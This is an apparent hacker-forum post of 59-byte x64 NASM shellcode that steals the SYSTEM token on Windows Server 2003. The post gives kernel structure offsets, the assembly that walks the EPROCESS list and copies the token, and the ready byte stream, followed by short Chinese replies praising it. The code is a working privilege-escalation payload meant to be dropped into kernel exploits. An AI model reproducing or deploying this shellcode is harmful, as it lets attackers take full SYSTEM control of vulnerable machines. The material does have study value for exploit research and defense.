win2k3/x64 - Token Stealing shellcode - 59 bytes

90_

1. ;token stealing shellcode Win 2003 x64
   
2. ;based on the widely available x86 version
   
3. ;syntax for NASM
   
4. ;Author: Csaba Fitzl, @theevilbit
   
5.   
   
6. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   
7. ;important structures and offsets;
   
8. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   
9.   
   
10. ;kd> dt -r1 nt!_TEB
    
11. ;   +0x110 SystemReserved1  : [54] Ptr64 Void
    
12. ;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
    
13.   
    
14. ;kd> dt -r1 nt!_KTHREAD
    
15. ;   +0x048 ApcState         : _KAPC_STATE
    
16. ;     +0x000 ApcListHead      : [2] _LIST_ENTRY
    
17. ;     +0x020 Process          : Ptr64 _KPROCESS
    
18.   
    
19. ;kd> dt -r1 nt!_EPROCESS
    
20. ;   +0x0d8 UniqueProcessId  : Ptr64 Void
    
21. ;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
    
22. ;     +0x000 Flink            : Ptr64 _LIST_ENTRY
    
23. ;     +0x008 Blink            : Ptr64 _LIST_ENTRY
    
24. ;  +0x160 Token            : _EX_FAST_REF
    
25. ;     +0x000 Object           : Ptr64 Void
    
26. ;     +0x000 RefCnt           : Pos 0, 4 Bits
    
27. ;     +0x000 Value            : Uint8B
    
28.   
    
29. BITS 64
    
30.   
    
31. global start
    
32.   
    
33. section .text
    
34.   
    
35. start:
    
36. mov     rax, [gs:0x188]         ;Get current ETHREAD in
    
37. mov     rax, [rax+0x68]         ;Get current EPROCESS address
    
38. mov     rcx, rax                ;Copy current EPROCESS address to RCX
    
39.   
    
40. find_system_process:
    
41. mov     rax, [rax+0xe0]         ;Next EPROCESS ActiveProcessLinks.Flink
    
42. sub     rax, 0xe0               ;Go to the beginning of the EPROCESS structure
    
43. mov     r9 , [rax+0xd8]         ;Copy PID to R9
    
44. cmp     r9 , 0x4                ;Compare R9 to SYSTEM PID (=4)
    
45. jnz short find_system_process   ;If not SYSTEM got to next EPROCESS
    
46.   
    
47. stealing:
    
48. mov     rdx, [rax+0x160]        ;Copy SYSTEM process token address to RDX
    
49. mov     [rcx+0x160], rdx        ;Steal token with overwriting our current process's token address
    
50. retn    0x10
    
51.   
    
52. ;byte stream:
    
53. ;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
    
54. ;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
    
55. ;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
    
56. ;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"
    

复制代码

a136

还是不错的哦，顶了

admia

你在哪里挖的啊

asion

支持中国红客联盟(ihonker.org)

HUC-参谋长

还是不错的哦，顶了

borall

还是不错的哦，顶了

ruguoruo

学习学习技术，加油！

ljy07

支持中国红客联盟(ihonker.org)

小龙

学习学习技术，加油！

asion

支持中国红客联盟(ihonker.org)